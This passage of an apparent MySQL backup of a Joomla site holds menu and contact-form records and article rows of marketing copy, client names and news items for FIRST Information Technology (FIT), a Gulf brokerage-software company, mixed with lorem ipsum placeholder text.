JEvents!\ncom_rss_limit_text=0\ncom_rss_text_length=20\ncom_rss_logo=\nmodcal_DispLastMonth=NO\nmodcal_DispLastMonthDays=0\nmodcal_DispNextMonth=NO\nmodcal_DispNextMonthDays=0\nmodcal_LinkCloaking=0\nmodlatest_MaxEvents=10\nmodlatest_Mode=0\nmodlatest_Days=5\nstartnow=0\nmodlatest_NoRepeat=1\nmodlatest_DispLinks=1\nmodlatest_DispYear=0\nmodlatest_DisDateStyle=0\nmodlatest_DisTitleStyle=0\nmodlatest_LinkToCal=0\nmodlatest_LinkCloaking=0\nmodlatest_SortReverse=0\nmodlatest_CustFmtStr=${eventDate}[!a: - ${endDate(%I:%M%p)}]\\n${title}\nmodlatest_RSS=0\n\n',1),(160,'JComments','option=com_jcomments',0,0,'option=com_jcomments','JComments','com_jcomments',0,'components/com_jcomments/assets/jcomments16x16.png',0,'object_group=com_jcomments\nobject_id=1\n',1),(161,'Manage comments','',0,160,'option=com_jcomments&task=comments','Manage comments','com_jcomments',0,'components/com_jcomments/assets/comments16x16.png',0,'',1),(162,'Settings','',0,160,'option=com_jcomments&task=settings','Settings','com_jcomments',1,'components/com_jcomments/assets/settings16x16.png',0,'',1),(163,'Smiles','',0,160,'option=com_jcomments&task=smiles','Smiles','com_jcomments',2,'components/com_jcomments/assets/smiles16x16.png',0,'',1),(165,'Custom BBCode','',0,160,'option=com_jcomments&task=custombbcodes','Custom BBCode','com_jcomments',4,'components/com_jcomments/assets/custombbcodes16x16.png',0,'',1),(166,'Import','',0,160,'option=com_jcomments&task=import','Import','com_jcomments',5,'components/com_jcomments/assets/import16x16.png',0,'',1),(167,'About','',0,160,'option=com_jcomments&task=about','About','com_jcomments',6,'components/com_jcomments/assets/jcomments16x16.png',0,'',1),(180,'AcyMailing','option=com_acymailing',0,0,'option=com_acymailing','AcyMailing','com_acymailing',0,'../media/com_acymailing/images/icons/icon-16-acymailing.png',0,'',1),(181,'Users','',0,180,'option=com_acymailing&ctrl=subscriber','Users','com_acymailing',0,'../media/com_acymailing/images/icons/icon-16-users.png',0,'',1),(182,'Lists','',0,180,'option=com_acymailing&ctrl=list','Lists','com_acymailing',1,'../media/com_acymailing/images/icons/icon-16-acylist.png',0,'',1),(183,'Newsletters','',0,180,'option=com_acymailing&ctrl=newsletter','Newsletters','com_acymailing',2,'../media/com_acymailing/images/icons/icon-16-newsletter.png',0,'',1),(184,'Templates','',0,180,'option=com_acymailing&ctrl=template','Templates','com_acymailing',3,'../media/com_acymailing/images/icons/icon-16-acytemplate.png',0,'',1),(185,'Queue','',0,180,'option=com_acymailing&ctrl=queue','Queue','com_acymailing',4,'../media/com_acymailing/images/icons/icon-16-process.png',0,'',1),(186,'Statistics','',0,180,'option=com_acymailing&ctrl=stats','Statistics','com_acymailing',5,'../media/com_acymailing/images/icons/icon-16-stats.png',0,'',1),(187,'Configuration','',0,180,'option=com_acymailing&ctrl=config','Configuration','com_acymailing',6,'../media/com_acymailing/images/icons/icon-16-acyconfig.png',0,'',1),(188,'Update_About','',0,180,'option=com_acymailing&ctrl=update','Update_About','com_acymailing',7,'../media/com_acymailing/images/icons/icon-16-update.png',0,'',1),(189,'Products','option=com_products',0,0,'option=com_products','Products','com_products',0,'components/com_products/images/products.png',0,'',1),(190,'Categories','option=com_products',0,189,'option=com_products&task=categories','Categories','com_products',0,'js/ThemeOffice/component.png',0,'',1),(191,'Products','option=com_products',0,189,'option=com_products&task=products','Products','com_products',1,'js/ThemeOffice/component.png',0,'',1); /*!40000 ALTER TABLE `bak_fit_bss_components` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_contact_details` -- DROP TABLE IF EXISTS `bak_fit_bss_contact_details`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_contact_details` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `con_position` varchar(255) default NULL, `address` text, `suburb` varchar(100) default NULL, `state` varchar(100) default NULL, `country` varchar(100) default NULL, `postcode` varchar(100) default NULL, `telephone` varchar(255) default NULL, `fax` varchar(255) default NULL, `misc` mediumtext, `image` varchar(255) default NULL, `imagepos` varchar(20) default NULL, `email_to` varchar(255) default NULL, `default_con` tinyint(1) unsigned NOT NULL default '0', `published` tinyint(1) unsigned NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text NOT NULL, `user_id` int(11) NOT NULL default '0', `catid` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `mobile` varchar(255) NOT NULL default '', `webpage` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_contact_details` -- LOCK TABLES `bak_fit_bss_contact_details` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_contact_details` DISABLE KEYS */; INSERT INTO `bak_fit_bss_contact_details` VALUES (3,'CONTACT FORM','contact-form','','info@fitoman.com','','','','','','','','',NULL,'ahmed.abulebdeh@builders-solutions.com',0,1,0,'0000-00-00 00:00:00',1,'show_name=0\nshow_position=0\nshow_email=0\nshow_street_address=0\nshow_suburb=0\nshow_state=0\nshow_postcode=0\nshow_country=0\nshow_telephone=0\nshow_mobile=0\nshow_fax=0\nshow_webpage=0\nshow_misc=0\nshow_image=0\nallow_vcard=0\ncontact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_email_form=1\nemail_description=\nshow_email_copy=1\nbanned_email=\nbanned_subject=\nbanned_text=',0,69,0,'',''); /*!40000 ALTER TABLE `bak_fit_bss_contact_details` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_content` -- DROP TABLE IF EXISTS `bak_fit_bss_content`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_content` ( `id` int(11) unsigned NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `title_alias` varchar(255) NOT NULL default '', `introtext` mediumtext NOT NULL, `fulltext` mediumtext NOT NULL, `state` tinyint(3) NOT NULL default '0', `sectionid` int(11) unsigned NOT NULL default '0', `mask` int(11) unsigned NOT NULL default '0', `catid` int(11) unsigned NOT NULL default '0', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(11) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(11) unsigned NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `attribs` text NOT NULL, `version` int(11) unsigned NOT NULL default '1', `parentid` int(11) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(11) unsigned NOT NULL default '0', `hits` int(11) unsigned NOT NULL default '0', `metadata` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=362 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_content` -- LOCK TABLES `bak_fit_bss_content` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_content` DISABLE KEYS */; INSERT INTO `bak_fit_bss_content` VALUES (281,'24/7 Client Support','247-client-support','','At vero eos et accusamus et iusto odio dignis- simos ducimus qui blanditiis praesentium volup- tatum deleniti atque<br />','',1,10,0,60,'2011-12-19 16:15:34',62,'','2011-12-19 16:30:15',62,0,'0000-00-00 00:00:00','2011-12-19 16:15:34','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,6,'','',0,55,'robots=\nauthor='),(282,'Premium Services','premium-services','','At vero eos et accusamus et iusto odio dignis- simos ducimus qui blanditiis praesentium volup- tatum deleniti atque','',1,10,0,60,'2011-12-19 16:31:52',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-19 16:31:52','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,5,'','',0,29,'robots=\nauthor='),(283,'Our Strategy','our-strategy','','At vero eos et accusamus et iusto odio dignis- simos ducimus qui blanditiis praesentium volup- tatum deleniti atque','',1,10,0,60,'2011-12-19 16:32:23',62,'','2011-12-20 12:22:08',62,0,'0000-00-00 00:00:00','2011-12-19 16:32:23','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,4,'','',0,31,'robots=\nauthor='),(284,'WHO ARE WE','who-are-we','','<p>Established in 1999, FIRST Information Technology (FIT) is a software solutions provider based in the GCC with offices in Oman, UAE and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector - mainly investment management solutions (brokerage, fund management, portfolio management, order management solution, risk management, index management, information dissemination and other industry specific solutions)</p>\r\n<p>FIT as a leader solution provider in the region, has the largest portfolio clients based in the GCC. FIT was the first provider who hit the Trading Engine for Muscat, Dubai, Abu Dhabi, NASDAQ Dubai, Qatar, Jordan and Damascus Stock Exchanges.</p>\r\n<p>FIT is working closely with the regional stock exchanges either as consultant or solution provider such as Dubai Financial Market portal, information dissemination website, Muscat Securities Marker website and Khartoum stock exchange trading engine.</p>','',1,11,0,61,'2011-12-19 16:44:42',62,'','2012-03-20 16:23:47',62,0,'0000-00-00 00:00:00','2011-12-19 16:44:42','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=Read More\narticle_suffix=',8,0,1,'','',0,39,'robots=\nauthor='),(321,'oab','oab','','<ol start=\"1\">\r\n<li>Oman Arab Bank</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:42:43',62,'','2012-03-21 13:44:08',62,0,'0000-00-00 00:00:00','2012-03-21 12:42:43','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,17,'','',0,0,'robots=\nauthor='),(322,'us','us','','<ol start=\"1\">\r\n<li>United securities</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:43:06',62,'','2012-03-21 13:44:02',62,0,'0000-00-00 00:00:00','2012-03-21 12:43:06','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,16,'','',0,0,'robots=\nauthor='),(323,'Financial Services','fs','',' ','',0,10,0,70,'2012-03-21 12:43:38',62,'','2012-03-21 13:44:56',62,0,'0000-00-00 00:00:00','2012-03-21 12:43:38','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,15,'','',0,0,'robots=\nauthor='),(285,'WHO ARE WE','who-are-we','','<p>Established in 1999, FIRST Information Technology (FIT) is a software solutions provider based in the GCC with offices in Oman, UAE, Qatar and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector - mainly investment management solutions (brokerage, fund management, portfolio management, order management solution, risk management, index management, information dissemination and other industry specific solutions)</p>\r\n<p>FIT as a leader solution provider in the region, has the largest portfolio clients based in the GCC. FIT was the first provider who hit the trading engine for Muscat, Dubai, Abu Dhabi, NASDAQ Dubai, Qatar, Jordan and Damascus Stock Exchanges.</p>\r\n<p>FIT is working closely with the regional stock exchanges either as consultant or solution provider such as Dubai Financial Market portal, information dissemination website, Muscat Securities Marker website and Khartoum stock exchange trading engine. Most of FIT’s employee’s background is from international companies like Andersen Consulting (Accenture).</p>\r\n<p>FIRST Information Technology FIT is specialized in design and implementation of software application ranging over a wide variety of areas. FIT started operations on year 1999 as software house. One of our major objectives is excellence performance, perfection of work, user satisfaction, and outstanding achievements. We stress excellence because we believe that one should reach the maximum in his performance and provide very fine and top quality products. We stress perfection, outstanding and completeness because we believe that the customer satisfaction is not achieved unless the product satisfies customer’s requirements perfectly and the final product is perfect, and eventually all those criteria will promote the products that we carry and produce. Our ultimate goals are user satisfaction, that we committed and we don’t leave unless the user is completely satisfied and could do the job relying on his team.</p>','',-2,11,0,61,'2011-12-19 17:09:09',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-19 17:09:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,39,'robots=\nauthor='),(286,'WHY FIT','why-fit','','<p>FIT has grown gradually within the We believe that we have the experience, the motivation and the professional staff to offer a unique combination of proprietary Information Technology solutions, complete professional services, new ideas, efficient, effective products and services.</p>\r\n<p>Over the past five years, our solutions have executed more than 750 Billion AED in UAE markets only and expected more than 950B AED in the coming three years.</p>\r\n<p>FIT has grown gradually within the region , serving the Omani securities market (MSM) brokers in the country (approx. 95% Oman market share), in addition to some of the largest brokerage houses in their respective GCC countries: The solution has therefore has been proven in 4 GCC countries. The company has also performed work for the Muscat Securities Market, Dubai Financial Market, and Capital Markets Authorities.</p>','',1,11,0,61,'2011-12-19 17:43:01',62,'','2012-03-20 16:24:44',62,62,'2012-09-12 08:03:33','2011-12-19 17:43:01','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,2,'','',0,201,'robots=\nauthor='),(324,'dfm','dfm','','<ol start=\"1\">\r\n<li><st1:place><st1:city>Dubai</st1:city></st1:place> Financial Market</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:44:04',62,'','2012-03-21 13:43:49',62,0,'0000-00-00 00:00:00','2012-03-21 12:44:04','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,14,'','',0,0,'robots=\nauthor='),(287,'OUR CULTURE','our-culture','','<p style=\"text-align: justify;\"><b>Integrity, State-of-the-art Technology and Delivering Client Value</b> are the three pillars of FIT culture backed by its experienced team of seasoned business and technical professionals who are committed to deliver successfully on time and within budget. FIT unique culture acts as a catalyst to grow its clients business growth opportunities. Today, FIT culture is very much evidence in attracting and retaining the best clients and best employees in the region. Yet, to maintain our competitive edge and meet our client’s high expectations, we continue to evolve our culture to a better state of maturity.</p>','',1,11,0,61,'2011-12-19 17:45:07',62,'','2011-12-19 17:56:53',62,0,'0000-00-00 00:00:00','2011-12-19 17:45:07','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,5,'','',0,2,'robots=\nauthor='),(288,'FIT VISION','fit-vision','','<p style=\"text-align: justify;\">Be the regional selected choice of technology partner in delivering Brokerage and financial investment applications.</p>\r\n<p style=\"text-align: justify;\">The financial services industry is one of the most complex industries with lots of diversifications and high risks. Finding the trusted and qualified partner is very important. While FIT clients focus on what they do best, our business and technical team provide reliable products and services that match the client’s needs.</p>','',1,11,0,61,'2011-12-19 17:45:28',62,'','2011-12-19 17:56:38',62,0,'0000-00-00 00:00:00','2011-12-19 17:45:28','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,3,'','',0,7,'robots=\nauthor='),(289,'FIT MISSION','fit-mission','','<p style=\"text-align: justify;\">Provide better services to enhance the operational efficiency of our clients. This statement served as a cornerstone for maximizing the added value we deliver to our clients.</p>\r\n','\r\n<p style=\"text-align: justify;\">Having this in mind and in order to bring the state of art technology to our region, we established the FIRST Information Technology FIT to achieve those goals among others. We look at information and data of any enterprise as part of its valuable assets, so it has to be preserved, </p>\r\n<p style=\"text-align: justify;\">maintained, and fully taken care off. By providing computer solutions to the enterprise, we believe we will accomplish our mission. The systems and software applications that we developed take care of the current needs as well as the future expansions and requirements without losing the investment in both hardware and software.</p>\r\n<p style=\"text-align: justify;\">The belief of rendering better service is to enhance the wealth of our clients. This mission statement of Qatar Securities Company served as cornerstone of maximizing value for shareholders with optimal services to all stakeholders through practicing good governance and promoting this in all listed companies and trading participants to sustain investor\'s confidence, thus reducing the risk and enhancing the value of their portfolios. Qatar Securities Company’s analysts are a conduit of quality information that money managers seek to make sound investment decisions.</p>',1,11,0,61,'2011-12-19 17:45:49',62,'','2011-12-27 10:00:05',62,0,'0000-00-00 00:00:00','2011-12-19 17:45:49','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',7,0,4,'','',0,87,'robots=\nauthor='),(290,'FIT BUSINESS PRINCIPLES','fit-business-principles-','','<ul>\r\n<li>Our clients interest and success comes first, by serving our clients better, we secure our own success.</li>\r\n<li>Our main assets are our people and excellent delivery reputation.</li>\r\n<li>Preserving our assets, people and clients financial returns and growth are very important to sustain our growth.</li>\r\n<li>Adherence and commitment to the heart and soul of the rules, regulations and instructions that organize the brokerage industry in the region is paramount to our business</li>\r\n<li>Quality services are very important to our huge market share.\r\n','\r\n</li>\r\n<li>All of our resources are deployed to provide our clients a solution to any issue that may arise during our course of business with our clients.</li>\r\n<li>We deploy the right person for the right job, since we understand the value of the employee who is providing professional and efficient service.</li>\r\n<li>Our efforts are focused in working as a team; since working together with our client business users will reduce any potential risks and deliver better results.</li>\r\n<li>The loyalty, commitment and dedication of our team to the success of our project delivery are key factors to the overall success of FIT.</li>\r\n<li>Competitiveness is very high in our industry, we work very hard to expand our clients business and increase their profitability, yet, we must always respect our competitors and promote fairness in our work environment.</li>\r\n<li>Honesty, integrity and transparency are key elements in our day-to-day operations, we expect all of our people to maintain the highest standards in all of what they deliver.</li>\r\n</ul>',1,11,0,61,'2011-12-19 17:46:34',62,'','2011-12-19 18:12:41',62,0,'0000-00-00 00:00:00','2011-12-19 17:46:34','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',4,0,6,'','',0,205,'robots=\nauthor='),(291,'KEY SUCCESS FACTORS','key-success-factors-','','<ul>\r\n<li style=\"text-align: justify;\">We are specialized in providing software solutions only for the business segments we know very well.</li>\r\n<li style=\"text-align: justify;\">We offer to our clients more than just a software system. Through the unrivalled business expertise and know-how of FIT staff, resulting from more than 15 years of industry experience.</li>\r\n<li style=\"text-align: justify;\">We are bringing our clients the competitive advantages of decreasing both the time to market for value-added services and the cost of ownership, while improving the quality of the services provided to their demanding clients.</li>\r\n<li style=\"text-align: justify;\">We are committed to a long-term partnership with our clients, based on a collaborative and constructive approach. We look for a truly win-win scenario.</li>\r\n<li style=\"text-align: justify;\">We enjoy a very low staff turnover (Almost 100% retention since company inception).</li>\r\n</ul>','',1,11,0,61,'2011-12-19 17:48:16',62,'','2011-12-20 10:20:12',62,0,'0000-00-00 00:00:00','2011-12-19 17:48:16','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',11,0,7,'','',0,1,'robots=\nauthor='),(292,'Wed, March. 15','wed-march-15','','<img style=\"float: left;\" src=\"images/stories/art_img/page1_img2.jpg\" />Nam libero tempore, cum soluta nobis<br style=\"font-size: 12px; color: #ffffff; font-family: Tahoma, Geneva, sans-serif; text-align: left;\" />est eligendi omnis voluptas as Nam libero tempore, cum soluta nobis<br style=\"font-size: 12px; color: #ffffff; font-family: Tahoma, Geneva, sans-serif; text-align: left;\" />est eligendi omnis voluptas as Nam libero tempore, cum soluta nobis<br style=\"font-size: 12px; color: #ffffff; font-family: Tahoma, Geneva, sans-serif; text-align: left;\" />est eligendi omnis voluptas as<br />','',-2,11,0,62,'2011-12-20 12:23:19',62,'','2011-12-20 12:26:24',62,0,'0000-00-00 00:00:00','2011-12-20 12:23:19','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,0,'','',0,8,'robots=\nauthor='),(293,'FIT- PROVIDES SICO UAE WITH BROKERAGE TRADING PLATFORM','fit-provides-sico-uae-with-brokerage-trading-platform','','FIT is pleased to announce that, FIT has successfully implemented the FIT Trading Platform for Securities & Investment Company United Arab Emirates (SICO UAE), an Abu Dhabi-based brokerage firm licensed by the Emirates Securities & Commodities Authority (ESCA).\r\n<p> </p>\r\n<p>Following an extensive evaluation process of systems offered by various other vendors in the region, SICO UAE selected the FIT Trading Platform -a comprehensive, unified trading solution - to meet its overall trading needs for Back Office, Front Office and internet Trading.</p>','',1,11,0,62,'2011-12-20 12:23:19',62,'','2012-09-10 16:13:04',62,0,'0000-00-00 00:00:00','2011-12-20 12:23:19','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,3,'','',0,38,'robots=\nauthor='),(294,'ESCA accredits FIT Margin Trading Module','wed-march-15','','<p>FIT is proud to announce that, Al-Ramz Securities – a leading Brokerage firm in UAE, Regulated by ESCA, has been accredited to carry out Margin Trading facilities for its clients on the Dubai Financial Market (DFM) and Abu Dhabi Securities Exchange (ADX).</p>\r\n<p> </p>\r\n<p>Al-Ramz Securities uses FIT Brokerage Platform, that meets SCA and UAE Capital Markets requirements to practice Margin Trading , this facility allows investors to borrow money from the Brokerage company to buy financial instruments.</p>','',1,11,0,62,'2011-12-20 12:23:19',62,'','2012-09-10 16:12:24',62,0,'0000-00-00 00:00:00','2011-12-20 12:23:19','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,2,'','',0,4,'robots=\nauthor='),(295,'CNBC Arabia uses BORSAT system','cnbc-arabia-uses-borsat-system','','<p>CNBC Arabia and Securities & Commodities Authority (SCA) launched an awareness program called Al Mahfaza. The program can be watched on CNBC Arabia every Saturday for 39 episodes in 9 months.</p>\r\n<p> </p>\r\n<p>BORSAT is installed on a laptop given to each participant for trading purposes.\"</p>','',1,11,0,62,'2011-12-20 12:23:19',62,'','2012-09-10 16:11:36',62,0,'0000-00-00 00:00:00','2011-12-20 12:23:19','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',4,0,1,'','',0,2,'robots=\nauthor='),(359,'al_mal','almal','','<ol>\r\n<li>AL MAL CAPITAL</li>\r\n</ol>','',1,10,0,70,'2012-09-11 11:45:56',62,'','2012-09-11 11:53:34',62,0,'0000-00-00 00:00:00','2012-09-11 11:45:56','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,3,'','',0,0,'robots=\nauthor='),(296,'PRIVACY POLICY','privacy-policy','','<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accumsan nulla vel diam. Sed in lacus ut enim adipis cing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula. Aliquam dapibus tincidunt metus. Praesent justo dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed ante. Donec sagittis euismod purus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Praesent vestibulum molestie lacus.</p>\r\n<p>Aenean nonummy hendrerit mauris. Phasellus porta. Fusce c mi. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla dui. Fusce feu giat malesuada odio. Morbi nunc odio, gravida at, cursus nec, luctus a, lorem. Maecenas tristique orci ac sem. Duis ultricies pharetra magna. Donec accumsan malesuada orci. Donec sit amet eros. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Mauris fermentum dictum magna. Sed laoreet aliquam leo. <br />Ut tellus dolor, dapibus eget, elementum vel, cursus eleifend, elit. Aenean auctor wisi et urna. Aliquam erat volutpat. Duis ac turpis. Integer rutrum ante eu lacus. Fusce eui smod consequat ante. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accumsan nulla vel diam. Sed in lacus ut enim adipiscing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula.</p>\r\n<p>Aliquam dapibus tincidunt metus. Praesent justo dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed ante. Donec sagittis euismod purus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Praesent vestibulum molestie lacus. Aeneannonummy hendrerit mauris. Phasellus porta. Fusce c mi. Cum sociis natoque penatib us et magnis dis parturient montes, nascetur ridiculus mus. Nulla dui. Fusce feugiat malesuada odio. Morbi nunc odio, gravida at, cursus nec, luctus a, lorem.</p>\r\n<p>Maecenas tristique orci ac sem. Duis ultricies pharetra magna. Donec accumsan malesuada orci. Donec sit amet eros. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Mauris fermentum dictum magna. Sed laoreet aliquam leo. Ut tellus dolor, dapibus eget, elementum vel, cursus eleifend, elit. Aenean auctor wisi et urna.<br />Aliquam erat volutpat. Duis ac turpis. Integer rutrum ante eu lacus. Fusce euismod consequat ante. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accumsan nulla vel diam. Sed in lacus ut enim adipiscing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula. Aliquam dapibus tincidunt metus. Praesent justo dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed 